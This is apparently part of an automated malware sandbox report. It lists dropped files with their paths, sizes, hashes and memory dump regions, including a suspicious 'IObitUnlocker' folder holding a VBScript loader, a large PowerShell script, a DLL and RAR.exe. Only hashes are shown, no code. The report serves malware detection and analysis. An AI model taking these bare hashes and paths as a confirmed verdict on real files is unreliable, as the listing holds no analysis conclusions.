9812fe8104a86e693d6baa02a4cdb56ea9a4aedb500b050346eb5ec6bda8dd09

SHA512
d0728fcce9484daedb2c9552ee2a818f7cccbeb1e9bca24a1c4fc1ca6e8c181c46cdc89670bfee3d6ad219ea6f69750bd03f776af4f9e4667872c66c11dbd255

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a7b5a5433fe76697fec05973806a648c

SHA1
786027abe836d4d8ff674c463e5bb02c4a957b70

SHA256
c8d623536ebdf5ffbefb84013d1c8ff5f853b59f1b09c80364c32b8ed5e4a735

SHA512
27be4c82e26468bbb9ce698ef305320f6cac46c953f88c714a0372fa524d098b9af2a87a88b14a134ff0f5f4b3d671902908622d2c7ec48e2c7bc458d7f5cc16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8ea156392347ae1e43bf6f4c7b7bc6ec

SHA1
7e1230dd6103043d1c5d9984384f93dab02500a6

SHA256
40b28bf59b3e2026ad3ebe2fecf464a03d7094fd9b26292477ad264d4efc1c75

SHA512
2479b86a9a31aa2f260ff6a1c963691994242ced728a27ffa2ee4e224945446a191bdb49ce399ec5a7d5d362499716133072e97d4253b5b4f09582d58b25144f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
9a1f084e58592e0255286e9b18b98957

SHA1
72548af272d68c24b412cced52c9a01e5db499e1

SHA256
267b4852f6c6650f88884b3770f624e6fdad6892f5b8f9c6329f27c01893a83d

SHA512
1be79573e390f2ae95d002879945d58d266f6861a12c0a1195ac65d9c36dcf58374292815295e2d6beedde94cd93b63844850729752a1fa300cb40a11c96049f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
bc0e763361385a3c65e1f72a352a61e2

SHA1
883d17322756780ece65304af4ba266a8a28374f

SHA256
53e8931727652bea303f04f2a54ebf28f300807f30aa83ad0a0e44f04cc1cb63

SHA512
98e07d87954b7cc031735e4b17e55356c6c98dbecd8d5c4d6cb4e16e0d97cd214f54730599aee019829ecf333a015e97c9fe72b76e256ec762f5fb9907692cc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a8a3efe24108ea71713b80614367ea2f

SHA1
1b36a38b9d12923f067f31be26ecb9299de6bb7c

SHA256
95fc19b17e20548cd97077058a7d834560e3d43a8bfb377c86a0bafbb16f9671

SHA512
ec868e9ddae18be4f7d959e19e1e3487c221761598cb276c2cbf347b7c4fa56c777a52cc2a9dbf2c4bf97c3165a821196a812d4c427c48bd740af42b79b92515

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
215c221ac0e6907ca2877e2ab44c0f80

SHA1
58512b3c1c25f5c735a319aed7ffce64c90b9155

SHA256
09ccb40287b725a80e4a74d9b62b100c7ca5f22dfa0e96e50ec7ab683d2f530f

SHA512
e4b386daf293934f557b13f1d264f39041c043d3ff1a5b13fc575b733a658654862f38d8f34d4c30dcb22a25ac79e220acb997a08d3a4a7c7c2129680a7b45aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4f39cb8a965fc898f6b948e980d19212

SHA1
1691a15a1f7d7eeda7dacf3c53ce07e639d3919b

SHA256
b37c64b1a4ad8a72b2dc9b7908fd199d3be8c9979c0d2eba1c4261530185974a

SHA512
33798705bfe13dfe18fdc10c19e4afb51cca8f50ec58ba43b82dd6ba33ec66b924f7eb276df2dd64ecfbf69aaee79e8b4d79562680334b2d4f31c7006b9c9226

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1ad9ff4e5a7f0d83c0e36c89d8057a59

SHA1
9ce4cd253eb7b3b137c713733f159fbc9ee97564

SHA256
0914df2dd89c54bb3ac1303191862c6ce9940e60956bfd975a712428286eba54

SHA512
5ac31d8099a98b4bb8b4fbcf40661c3e8f0378d0ed9dbffbc22f4dad83c1b55cdff88e4771a8d9489ede035f9c14fe9db3c793cf1d28403beb911dbabcb0e510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ff8cfd56bd64c1519eb3c4ccbc02d6a4

SHA1
878d2952c64f4402311a16c5f7800cb507493da4

SHA256
e571cc4ac1655f1fb674084ab7c7ad8dae1bc2a81c77cd4804446cc881bb2b24

SHA512
46b696dd14f6c4a7f7f5c7b96f07cdb62e4a32780a7518a9b5b427df884757d23121c079d747d731768372a9a3699606383f4ad95776433fd39d7d1b4d744446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
34c1113af54846a59e1515492f5b34ce

SHA1
0c5b3b6b5a771dc2a53da2d73cb2233d2b367fb0

SHA256
201e188dac0a5b7e53b5f445cb81014b5b8df9d41751a2a53ed2faf984366233

SHA512
4109e336a323cdb05b5e7e8971810fd06f50d78103c5ec7e8256b6a7e242eef7dc9edefa8f881e2cc9184d6e50729415d42cc50ad7aa621119b53f631c176ead

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
531490c29468222d0e1afa5e00d31340

SHA1
f316dafa33db4ac6a0451acaf1930efbfbe530fa

SHA256
7e65e8ab461a0e92055ef9cfcdbf0ad1cc2e61843f09ffe7036da12cfc22b821

SHA512
0fb9e34feb93beb35c53bd3293858a494c43fb8939f67b45818dc946c5c731164759cae99c6a4a554d52e9321e90575aa81069cf92f518a8342bdf80d8da05d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qvlvimjl.doh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 653692.crdownload

Filesize
5.4MB

MD5
77bccf39263dca973605a6738ad416f9

SHA1
c974af30fa4122a7b04a901f42d5ebffcfdbd6e8

SHA256
d7a6c436e81f9f88b1419b3a3a6f46903b57c460ac5bfea1454808e3588adb59

SHA512
673e52c840cc3c36987abee2be887bec5235d9dbfd1c11d464bdcbef98c028b1eb2c4075b4faab30f010520e2abe3db1d9ea97c1fb5ef58c19da4b89071f8d9c

Download Submit
C:\Users\Public\IObitUnlocker\EN.dll

Filesize
49KB

MD5
423f3a8f8289fda22055c3c6ddf3bdef

SHA1
23d160ca742e6124238fbf94c3be148737849ee3

SHA256
bf6176ac2944b356b888d0a40d858ad4321cd1f73ea8cc50f1cae4594e303f25

SHA512
83c1b76b70c25e031aa1e30a6a34729d3165a2e8b1c350b240855e6962db3260de99ae8abb2a9b6a391123256d46f92d52268a70e34723dd4be6fe89455bd22f

Download Submit
C:\Users\Public\IObitUnlocker\Loader.vbs

Filesize
308B

MD5
2993b76e0b0ba015caf654881638a0c0

SHA1
7fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd

SHA256
0e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3

SHA512
a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb

Download Submit
C:\Users\Public\IObitUnlocker\RAR.exe

Filesize
629KB

MD5
d3e9f98155c0faab869ccc74fb5e8a1e

SHA1
8e4feaad1d43306fdd8aa66efa443bca7afde710

SHA256
3e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b

SHA512
2760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d

Download Submit
C:\Users\Public\IObitUnlocker\Report.ps1

Filesize
457KB

MD5
aff5c405f7a9f0b3e6e77da9ea517c01

SHA1
0a956bfd7d4fedeaba8fd50373aa1d2fe29e9f21

SHA256
a784f9965c2d168311cbbc4e56cfb562d8f0d0adb6771c41931ebf0912b9a7cf

SHA512
90fd88c1dbe978c3c74400321f9639cd1263d0811b75df99178db4163ae0dfbc86dd8e2ef45b83f5d431ae83ea03cd435d00fd4922458c6e3d21d9e5be293c77

Download Submit
memory/1808-389-0x0000022A4DAF0000-0x0000022A4DAFA000-memory.dmp

Filesize
40KB

Download
memory/1944-396-0x00000000072A0000-0x0000000007306000-memory.dmp

Filesize
408KB

Download
memory/1944-395-0x0000000007200000-0x000000000729C000-memory.dmp

Filesize
624KB

Download
memory/1944-394-0x0000000005770000-0x000000000577A000-memory.dmp

Filesize
40KB

Download
memory/1944-393-0x00000000057A0000-0x0000000005832000-memory.dmp

Filesize
584KB

Download
memory/1944-392-0x0000000005C70000-0x0000000006214000-memory.dmp

Filesize
5.6MB

Download
memory/1944-390-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/5112-328-0x000001C10C2B0000-0x000001C10C2B8000-memory.dmp

Filesize
32KB

Download
memory/5112-329-0x000001C10C3D0000-0x000001C10C3DA000-memory.dmp

Filesize
40KB

Download
memory/5112-335-0x000001C127370000-0x000001C1273A8000-memory.dmp

Filesize
224KB

Download
memory/5112-336-0x000001C1289D0000-0x000001C1289D8000-memory.dmp

Filesize
32KB

Download
memory/5112-338-0x000001C1282F0000-0x000001C1282FE000-memory.dmp

Filesize
56KB

Download
memory/5112-334-0x000001C1273F0000-0x000001C1274AA000-memory.dmp

Filesize
744KB

Download
memory/5112-333-0x000001C127280000-0x000001C127332000-memory.dmp

Filesize
712KB

Download
memory/5112-325-0x000001C10A4D0000-0x000001C10A5C4000-memory.dmp

Filesize
976KB

Download
memory/5112-326-0x000001C10C460000-0x000001C10C546000-memory.dmp

Filesize
920KB

Download
memory/5112-327-0x000001C124C70000-0x000001C124C96000-memory.dmp

Filesize
152KB

Download
memory/5128-254-0x000002567E530000-0x000002567E552000-memory.dmp

Filesize
136KB

Download
memory/5996-248-0x000002AABBB70000-0x000002AABBB71000-memory.dmp

Filesize
4KB

Download
memory/5996-249-0x000002AABBC00000-0x000002AABBC01000-memory.dmp

Filesize
4KB

Download
memory/5996-244-0x000002AABBAF0000-0x000002AABBAF1000-memory.dmp

Filesize
4KB

Download
memory/5996-237-0x000002AAB2FA0000-0x000002AAB2FB0000-memory.dmp

Filesize
64KB

Download
memory/5996-235-0x000002AAB2F80000-0x000002AAB2F90000-memory.dmp

Filesize
64KB

Download
memory/5996-246-0x000002AABBB70000-0x000002AABBB71000-memory.dmp

Filesize
4KB

Download
memory/5996-250-0x000002AABBC00000-0x000002AABBC01000-memory.dmp

Filesize
4KB

Download
memory/5996-251-0x000002AABBC10000-0x000002AABBC11000-memory.dmp

Filesize
4KB

Download
memory/5996-252-0x000002AABBC10000-0x000002AABBC11000-memory.dmp

Filesize
4KB

Download